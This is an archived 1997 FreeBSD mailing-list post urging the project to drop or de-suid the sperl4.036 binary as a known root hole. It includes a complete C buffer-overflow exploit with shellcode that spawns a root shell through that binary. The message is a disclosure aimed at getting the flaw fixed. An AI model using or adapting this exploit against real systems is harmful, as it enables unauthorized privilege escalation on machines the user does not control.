Skip site navigation (1)Skip section navigation (2) 
Date:      Mon, 15 Sep 1997 06:30:43 +0200 (CEST)
From:      Existence is Futile <nonxstnt@not.of.this.world.engelska.se>
To:        freebsd-hackers@FreeBSD.org
Subject:   Why SPERL? 
Message-ID:  <Pine.BSF.3.96.970915062637.22299A-100000@krusty.the.clown.engelska.se>
next in thread | raw e-mail | index | archive | help 
Someone posted a similar message earlier, but I never saw a reply (might
have been because the mailserver for this domain is Linux.. hehe). But I
just want to bring it to your attention again.

Why does even the latest RELENG (that I've used) include sperl4.036? when
it's a well known way to get root? it came in handy today when some guy
couldn't su because he wasnt in the wheel group and couldn't login as root
any other way (being 45 minutes away). But, it's a serious security flaw!

Perhaps we shouldn't include sperl4.036? or turn its suid off. I'm not
sure if 4.0 is still being maintained, so I dont know if there is a newer
version available, but I dont believe it acceptable to purposely leave
root holes in. 

Of course, this may have already been fixed and I'm just blowing hot air
all around, but its an old exploit and the august releng's at least
include it. 

/************************************************************/
/*   Exploit for FreeBSD sperl4.036 by OVX                  */
/************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define BUFFER_SIZE     1400
#define OFFSET          600

char *get_esp(void) {
        asm("movl %esp,%eax");
}

char buf[BUFFER_SIZE];

main(int argc, char *argv[])
{
    int i;
    char execshell[] =
                       "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
                       "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
                       "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
                       "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

    for(i=0+1;i<BUFFER_SIZE-4;i+=4)
       *(char **)&buf[i] = get_esp() - OFFSET;

    memset(buf,0x90,768+1);
    memcpy(&buf[768+1],execshell,strlen(execshell));

    buf[BUFFER_SIZE-1]=0;

    execl("/usr/bin/sperl4.036", "/usr/bin/sperl4.036", buf, NULL);
}


--
thomas stromberg . system admin @ Royal Institute of Technology, Stockholm
nobody@darkening.com (nobody@EFnet), talk:nobody@krusty.the.clown.engelska.se

Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.3.96.970915062637.22299A-100000>